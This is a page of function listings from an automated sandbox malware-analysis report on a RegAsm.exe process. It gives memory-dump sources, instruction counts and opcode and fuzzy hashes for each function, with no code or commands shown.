Function 05EB4500 Relevance: .7, Instructions: 745
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5d45278cd8a120840470af0bcbcdb71dc4c8aec44c2b498fcedc69bf574e93d
Instruction ID: 3307d9f01a79c46bf800f8572250133da223c1077feddf7c4b9c404d553261be
Opcode Fuzzy Hash: d5d45278cd8a120840470af0bcbcdb71dc4c8aec44c2b498fcedc69bf574e93d
Instruction Fuzzy Hash: 5A827D74E012289FEB65DF69D894BDDBBF2BB89300F1081EA950DA7265DB705E81CF40

Function 05EB6998 Relevance: .5, Instructions: 517
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a790abb75f7f1063fc1eed371d13f8e7f9384101a38a63e3e332e8d697064c8d
Instruction ID: 0d725e7bf58a24258678016be094feeccc400606f2355092b53ce671ec060325
Opcode Fuzzy Hash: a790abb75f7f1063fc1eed371d13f8e7f9384101a38a63e3e332e8d697064c8d
Instruction Fuzzy Hash: F6128D70A002198FEB14DF69C854AAEBBF6BF88704F148569E446EB395DF70DD41CB90

Function 05EB7198 Relevance: .3, Instructions: 332
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88a307bc7b5c75e83ad5941b34fc45cccc4412b76d1d84bf5dfdfffa79f7fa7b
Instruction ID: 927bc33cd8cdd6450af9b930e1049efcd0d0da688075e5abb5d4fd00eda72dbd
Opcode Fuzzy Hash: 88a307bc7b5c75e83ad5941b34fc45cccc4412b76d1d84bf5dfdfffa79f7fa7b
Instruction Fuzzy Hash: 97D14C70A04119DFEB14CFA8D984AEEBBB2FF88306F159165E885A7660D770ED41CB90

Function 05EB15F8 Relevance: .3, Instructions: 296
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f49f6fe509811fbba77f2947333a78993f3a04e6c200fb21b86095696e10a16d
Instruction ID: 8d02b889982abaa92ae69499919e4250112f785189829da5da10a6f68c1ac1eb
Opcode Fuzzy Hash: f49f6fe509811fbba77f2947333a78993f3a04e6c200fb21b86095696e10a16d
Instruction Fuzzy Hash: 18E1C074E01218CFEB24DFA5C994BDDBBB2BF89304F2081A9D409AB395DB755A85CF10

Function 00F04F08 Relevance: .3, Instructions: 268
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.3416786849.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2ab274e9fd00a82fa27803fd6ca8cd864d6be75e1eff4128ab22e12e7066320
Instruction ID: bcebcd58b7aae4588b9fd5312a8474e409841ba85de356d90fadcce91a620568
Opcode Fuzzy Hash: e2ab274e9fd00a82fa27803fd6ca8cd864d6be75e1eff4128ab22e12e7066320
Instruction Fuzzy Hash: 34C1B278E01218CFDB14DFA5D944B9DBBB2BF88300F1085AAD809AB365DB759E85DF10

Function 00F05358 Relevance: .2, Instructions: 229
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.3416786849.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b7fa58dff0adc2202c9b3773476f8be7b87bb4b9b90fd51eebae11e7cfd091b
Instruction ID: 3d40c7ccd9187b704bbefaa1bd59cf13b6eeb38d8cbe8244e5208a1af6e175de
Opcode Fuzzy Hash: 7b7fa58dff0adc2202c9b3773476f8be7b87bb4b9b90fd51eebae11e7cfd091b
Instruction Fuzzy Hash: 9BA12874D00608CFDB14DFA8C948BEDBBB1FF88314F24826AD409AB291DBB49985DF50

Function 00F05367 Relevance: .2, Instructions: 217
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.3416786849.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 022dc3e5e4eb5f60d7a7db1c62a4d939c06646d0feff3d7d49cfb4053eca2adb
Instruction ID: 6154fdc453f9304bbe7ccd54d081867928de90e16044eb4d2ee09e5df8e07fb7
Opcode Fuzzy Hash: 022dc3e5e4eb5f60d7a7db1c62a4d939c06646d0feff3d7d49cfb4053eca2adb
Instruction Fuzzy Hash: B7A10774D00608CFEB14DFA9C954BEDBBB1FF88314F24826AD409AB291DBB59985CF50

Function 00F056AF Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3416786849.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5895abdec40a717fbcd2340a2a62517b7e3694feb0962a2f984f7c8c240b248e
Instruction ID: fb7633d1a25122d0f9efc16cc9fe3967b50bf41d20ad5bfa8b2900b3f0e21c2f
Opcode Fuzzy Hash: 5895abdec40a717fbcd2340a2a62517b7e3694feb0962a2f984f7c8c240b248e
Instruction Fuzzy Hash: F891F374D00618CFEB10DFA8C948BEDBBB1FF48314F24825AE409AB291DBB59985DF14

Function 05EB1C58 Relevance: .2, Instructions: 182COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d498e6f5e55557c7b92a28fa84d79ac773a1ff00eeb9cc429450c8f56a590bd4
Instruction ID: 1da67d8a7ec35ce84346416303994623253494a2482d145e3ebbf4649a6aaa7e
Opcode Fuzzy Hash: d498e6f5e55557c7b92a28fa84d79ac773a1ff00eeb9cc429450c8f56a590bd4
Instruction Fuzzy Hash: E581D170E01218CFEB58DFAAD8547EEBBF2BF89305F20906AD419AB254DB745941CF40

Function 05EB15EB Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99d2da223bc1c789ebd816087ee1dc00ee8947f7f8c28b88d958d0f0dd522ad8
Instruction ID: 08b456d50fcff1c9b18603f1c9d1c054850120f36f56938969f80e17f03022db
Opcode Fuzzy Hash: 99d2da223bc1c789ebd816087ee1dc00ee8947f7f8c28b88d958d0f0dd522ad8
Instruction Fuzzy Hash: D341E3B0D002088BEB18DFAAC8547DEFBB2BF88304F14D169C418BB294EB755946CF64

Function 00F0C76C Relevance: 1.6, APIs: 1, Instructions: 62
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(00000000), ref: 00F0C8AE

Memory Dump Source

Source File: 00000005.00000002.3416786849.0000000000F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f00000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c6a7da7258f766ba369285ca7f0b1588297b3df436713a53ae06ec0c6cba41c0
Instruction ID: c743d300430444391ceb5c172151a23c1f2e993f253bb6329b67d7fa6f527ab3
Opcode Fuzzy Hash: c6a7da7258f766ba369285ca7f0b1588297b3df436713a53ae06ec0c6cba41c0
Instruction Fuzzy Hash: 7A118175E002198FEB04DFE8D484BADBBF5FB88304F64C225E844A7291D771D842EB94

Function 05EB8848 Relevance: .8, Instructions: 789
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 162d8afeb30a3eacd87068a86dd3bfe237d41ef88dade35e0aff253782c682eb
Instruction ID: 56544ef91b575fd780f41bfa083e615d94e83abc11d944edf8af6361bae10340
Opcode Fuzzy Hash: 162d8afeb30a3eacd87068a86dd3bfe237d41ef88dade35e0aff253782c682eb
Instruction Fuzzy Hash: 1F621535A00219CFEB149BE4C8A0BEEBFB2FF84700F1091A9D2466B395DE759E458F51

Function 05EB65F1 Relevance: .2, Instructions: 224
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d516c5147992911f363c1eed4426129da0f0e81f323c980413d3d742dd7ef34f
Instruction ID: e749893831481c96e8869016431c61f0efc486a479d6dc3ca1772ad675baf10b
Opcode Fuzzy Hash: d516c5147992911f363c1eed4426129da0f0e81f323c980413d3d742dd7ef34f
Instruction Fuzzy Hash: E581C335E04115CFEB14CF68C984AEBB7B2FF88205B14A1A9D446E7365EBB1E801CB90

Function 05EB62A8 Relevance: .2, Instructions: 220
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05f5255e51a6ac9ca974580a78bf17731c751f57b7b25e0cfa51475f6fc32de8
Instruction ID: fbb6632cc3b5eae82d7eb81b33098976a653438cc7a1e4a234beb9fe4a6a8c48
Opcode Fuzzy Hash: 05f5255e51a6ac9ca974580a78bf17731c751f57b7b25e0cfa51475f6fc32de8
Instruction Fuzzy Hash: 4571FE303042118FEB19AB79C454ABF7AE3BBC8645B148579E586CB395EFB4DC42CB80

Function 05EB84F8 Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d07e20a7cc5f55815f28363528be4584abdc84c594ed02848c348127b297802
Instruction ID: 6812402e7b028d78c50f96e3f5d622f0dbcdd6b0a6b8ebd8eb1111cbacc16d18
Opcode Fuzzy Hash: 6d07e20a7cc5f55815f28363528be4584abdc84c594ed02848c348127b297802
Instruction Fuzzy Hash: 6C51AF317081128FEB14DF39C894AAB77EEBF4825670555BAE486CB365EBB1DC01CB50

Function 05EB44F0 Relevance: .2, Instructions: 175COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5b57357a09d200769c44c00eed71333ee9012e39963042bd1bfd5291494695e
Instruction ID: 4665083611d68538cb4a79918fb629a11e4de46a77a1597ec5e4d169333de46e
Opcode Fuzzy Hash: a5b57357a09d200769c44c00eed71333ee9012e39963042bd1bfd5291494695e
Instruction Fuzzy Hash: 4481B274E412289FDB65DF29D851BEDBBF2BB89300F1080EAD949A7254EB705E81CF40

Function 05EB704D Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c366503f519d5a0852eb06036802343f20a906eff0787b637352c39f06a4f996
Instruction ID: 6a38bebb5ad7b7e205aee8c05d7ad2584dca6dbf20aa101d6870b34ce958cefd
Opcode Fuzzy Hash: c366503f519d5a0852eb06036802343f20a906eff0787b637352c39f06a4f996
Instruction Fuzzy Hash: A951AF70A002089FEB14DFA4C844BEFBBF6FB88345F04842AE8569B651D7B4DD45CBA0

Function 05EB2530 Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 900d9cc3f6d1b585184fdf8c089dff53190ef0de712f1cc634923f6eb917aae1
Instruction ID: 99b8d034aca5972f4522c3492496b98b327253fe2c162574ea85360141a3e242
Opcode Fuzzy Hash: 900d9cc3f6d1b585184fdf8c089dff53190ef0de712f1cc634923f6eb917aae1
Instruction Fuzzy Hash: FD414035E002199BEB15DFA5C850AEEBBF2BFC4700F548129E402BB284DF70AD46CB91

Function 05EB6130 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc57948cc64cc3d4ec5c05fba16e356ae28000c5fe9a9edbabe535769cdf4912
Instruction ID: b3f0aaeacd3dff184457efbb9f0ec9e13fd738482d8ae1ade79a324d975c0e81
Opcode Fuzzy Hash: cc57948cc64cc3d4ec5c05fba16e356ae28000c5fe9a9edbabe535769cdf4912
Instruction Fuzzy Hash: 5541D1356082549FEF169F24D844BEB7FF2FF88205F098959E886DB281DB78D801CB91

Function 05EB5F08 Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a30c6a3ca198e3372f7f12b21bb43afb5e1db1876f9085aa2900dd3015b10fe1
Instruction ID: 987a0a8795b506e822024289ccbdf73bf63c9c4e1c4490680b7b364ba892502c
Opcode Fuzzy Hash: a30c6a3ca198e3372f7f12b21bb43afb5e1db1876f9085aa2900dd3015b10fe1
Instruction Fuzzy Hash: 2641D2343007018FE728AB3AD858B6B7BE6AFC4605F04556DE686CB7A0EFA4EC01C740

Function 05EB82F8 Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abb31b9a32e34536f87ac3f9e0179650f3a108e96783b6b5749679e3404ce3ff
Instruction ID: 877bdd974c74f7a09b4c67ff8959e9ab2f7a05122d927082fd36340a6f51bf59
Opcode Fuzzy Hash: abb31b9a32e34536f87ac3f9e0179650f3a108e96783b6b5749679e3404ce3ff
Instruction Fuzzy Hash: 3A4176746081158FEB14DF28C898AAE3BBAFF48316F100169F946CB3A0CBB4DC41CB91

Function 05EB5858 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be4b4838efccc98224ee9f86a2175714ff97edd8d7f06651c36b3dca9c8b15b6
Instruction ID: 5c92e51033314005e56d24479cd4b357fb67ff7cd3dc4377436ac4352e9016c9
Opcode Fuzzy Hash: be4b4838efccc98224ee9f86a2175714ff97edd8d7f06651c36b3dca9c8b15b6
Instruction Fuzzy Hash: 5641BF31604109AFEF059F64D845AFF3BA2FB88315F0044A6F9958B350EBB5DA61DB90

Function 05EB8729 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17b69f2d728125809d6aa166af1725137f97ab148de3dd62551a68dc0dd3ad12
Instruction ID: 0c83e431a6a2cce336d96f451c154a97a2fbdf96a575de1ffab729a30a0427cf
Opcode Fuzzy Hash: 17b69f2d728125809d6aa166af1725137f97ab148de3dd62551a68dc0dd3ad12
Instruction Fuzzy Hash: 71212735B081114BFB245A29C854BBF268FBFC861EF549075D542DB398EFB5CC429380

Function 05EB8640 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbb61bc6b2a99eeadf25185a2e9cd046d2e7a10acf079d7f8e7006364b98568d
Instruction ID: 0e4cf635f62c00ddb95db907a2791d1cbe3c8ca422e3d698b367562f0a830878
Opcode Fuzzy Hash: cbb61bc6b2a99eeadf25185a2e9cd046d2e7a10acf079d7f8e7006364b98568d
Instruction Fuzzy Hash: C721B73130C1558BF714EE669840AFB7BEEBB85206B045426F982DB358EBF1DC00C760

Function 05EB68A1 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9a062f80b2186449b59c72e1054225717b6497f5ca3c3d173b70e65d0108e08
Instruction ID: fee5311e3ca408d61a92af3afb5c2200d27ce64a63587a82025073ce26a53364
Opcode Fuzzy Hash: e9a062f80b2186449b59c72e1054225717b6497f5ca3c3d173b70e65d0108e08
Instruction Fuzzy Hash: F921D4313053058BDB18A6BD9C46AAB3FEAABC4254F145579A641CF39AEEB4DC018391

Function 00BCD030 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3415427818.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_bcd000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a671fc6104dc0b9e096873199cd18d674df7f8f2bff10ae7be65f09bc6768f9
Instruction ID: e858c3035b4172e2d0196662968852d1f7a24f8b01ea977d5e0895c10fbfd969
Opcode Fuzzy Hash: 1a671fc6104dc0b9e096873199cd18d674df7f8f2bff10ae7be65f09bc6768f9
Instruction Fuzzy Hash: 53210479604244EFDB14DF18D9D0F26BBA1FB84314F24C6BDD9094B252C77AD847CA62

Function 00BCD006 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3415427818.0000000000BCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BCD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_bcd000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94a8e321441c563e506edc26ea59a707848173fffea20b07aaf229b8977aaabf
Instruction ID: 5dfae564344445fca44bb4624d8d0b4768f4c7f254a73f213e13822d5b2b0422
Opcode Fuzzy Hash: 94a8e321441c563e506edc26ea59a707848173fffea20b07aaf229b8977aaabf
Instruction Fuzzy Hash: 6221627550D3C08FC713CB24D990B15BF71AB46214F29C5EBC8898B6A3C23A980ACB62

Function 05EB2270 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 253fb40c9c7c10e1924563b86f7483fe5d7bc3a535b62ca97926016da161044e
Instruction ID: d0f909e1f1d6de5e70c6729fb5a24358c018ef459edc0ccbb40d262e15d5a650
Opcode Fuzzy Hash: 253fb40c9c7c10e1924563b86f7483fe5d7bc3a535b62ca97926016da161044e
Instruction Fuzzy Hash: 0E1153B6800249DFDB10CF99C845BEEBFF4EF48320F149419EA58A7210D379A950DFA5

Function 05EB5EF8 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6338a414fac28ce018ef072689abca453d8c5cab52bf86b409ab77ba08b55956
Instruction ID: c9017c81f3b5f5605938e734010227a8ea372bf90858163ebe64882732e3d898
Opcode Fuzzy Hash: 6338a414fac28ce018ef072689abca453d8c5cab52bf86b409ab77ba08b55956
Instruction Fuzzy Hash: EA11C631200B118FF735972EC844BABBBE6AFC0355F04961DD196876A1EFE4E8058781

Function 05EB26F7 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3713addd8ffdd058c57aaa17f93b3cfd7b9d3bf08bbece85aaceba13e537358d
Instruction ID: 4f63e8539a81858c4701220bde93c16b0e7404e25b3dc6791920d4655deea509
Opcode Fuzzy Hash: 3713addd8ffdd058c57aaa17f93b3cfd7b9d3bf08bbece85aaceba13e537358d
Instruction Fuzzy Hash: 8D01F9267083545FDF0B2F7454252AE3FA3EFC5610B4400AAE642DB3D2CF244D168796

Function 05EB1EB9 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c80f76b60e32be41f7b62da3e3a7ee4fb2149b452c7afd67c0620c120a019771
Instruction ID: 8fb3570da73d4c00d38cd72dde87b761f19e727b0452ea534a2590e5b8975088
Opcode Fuzzy Hash: c80f76b60e32be41f7b62da3e3a7ee4fb2149b452c7afd67c0620c120a019771
Instruction Fuzzy Hash: 6811FE39E401588FEB04DBF8D850BEEBBF6AF48311F00A161E848E7359E7719942CB51

Function 05EB2990 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20402bb06f4ea9f7adede93288b9cc06ad9c567159f44876abbf48551d54fad6
Instruction ID: 5d60e468bd4b70a3f176a8ab7657a375d48582405fd9b27a5d692afa7858bd8d
Opcode Fuzzy Hash: 20402bb06f4ea9f7adede93288b9cc06ad9c567159f44876abbf48551d54fad6
Instruction Fuzzy Hash: 421164B680024ADFDB10CF99C945BEEBFF4EF48320F14881AE658A7210D379A554DFA4

Function 05EB60B0 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27c6f1d9f59cc35adaa877cc6e41a7f0c89481793c36cac0069756add4b7324d
Instruction ID: 59ef5f7c6935142a6dc947dc7e7cc64b589b4c76659d8a4f5be707b00ebd604f
Opcode Fuzzy Hash: 27c6f1d9f59cc35adaa877cc6e41a7f0c89481793c36cac0069756add4b7324d
Instruction Fuzzy Hash: 910126327041186BAF09DE699800BEF7BEBEBC8790F48802AF945D7280DFB19C019790

Function 05EB60A0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8fe8132077659e969b8506e7c4c29fbd9970c8aea7945deea0a0d642c0c6c4b
Instruction ID: b500b1e81fddaebe0f544e6303c55b42168df8ddd4033378a873e37523e0508b
Opcode Fuzzy Hash: e8fe8132077659e969b8506e7c4c29fbd9970c8aea7945deea0a0d642c0c6c4b
Instruction Fuzzy Hash: 1A01D673A081086BEB15DE65DC01BDF7FAAEBC4750F088029F985C6240DA75D911C790

Function 05EB2758 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5add11603d068b01f2c2e66f7f48b08d18cb269c448b26f04ad3b34b19d83a55
Instruction ID: 3329a3c7cc93092b2cd706814d600fd8fc28a5e7e7b10e00c833a151c3dbac3e
Opcode Fuzzy Hash: 5add11603d068b01f2c2e66f7f48b08d18cb269c448b26f04ad3b34b19d83a55
Instruction Fuzzy Hash: 3EF0BE323042196B8F09AEA898459EF3AABEFC8360F40402AFA09D7250DA719D1097A5

Function 05EB2753 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e96ff4b106419a5a9ec7864484c2383b0148afc0b050b21f54b504b97935446
Instruction ID: 7c0449ea81b045c5fc00cd366a598ac3f8e07ea800c20a198340557341fb0e02
Opcode Fuzzy Hash: 3e96ff4b106419a5a9ec7864484c2383b0148afc0b050b21f54b504b97935446
Instruction Fuzzy Hash: C9F0BE37700219ABDF0A9EA89C45AEE3BA7EFC8310F00402AFA09D7250DA719D1597A4

Function 05EB947D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.3422355900.0000000005EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_5eb0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
